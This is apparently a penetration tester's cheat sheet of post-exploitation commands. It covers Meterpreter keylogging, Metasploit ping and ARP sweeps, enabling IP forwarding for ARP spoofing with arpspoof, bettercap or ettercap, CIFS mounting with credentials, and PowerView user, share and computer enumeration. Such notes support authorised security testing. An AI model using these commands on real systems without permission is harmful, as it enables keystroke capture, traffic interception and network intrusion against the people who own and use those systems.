- Keylogging
keyscan_start
keyscan_dump
- Dump all captured-
todo
- Gather live hosts on netblock
use post/multi/gather/ping_sweep
use post/windows/gather/arp_scanner
(Win Beacon)run arp_scanner -r x.x.x.x/24
- Enable port forward -
echo 1 > /proc/sys/net/ipv4/ip_forward
- Use
arpspoof
,bettercap
, orettercap
- CIFS mount -
mount -t cifs //<ip>/share /mnt/lolz -o rw,vers=1.0,user=<user>,password=<password>
- PowerSploit - PowerView
Get-NetComputer
/Get-NetComputers -full
Get-NetShare
Get-NetUser
- Auto enum -
run winenum
- Privs -
run post/windows/gather/win_privs
- SessionGopher (WMI methods of gathering session info) - https://github.com/Arvanaghi/SessionGopher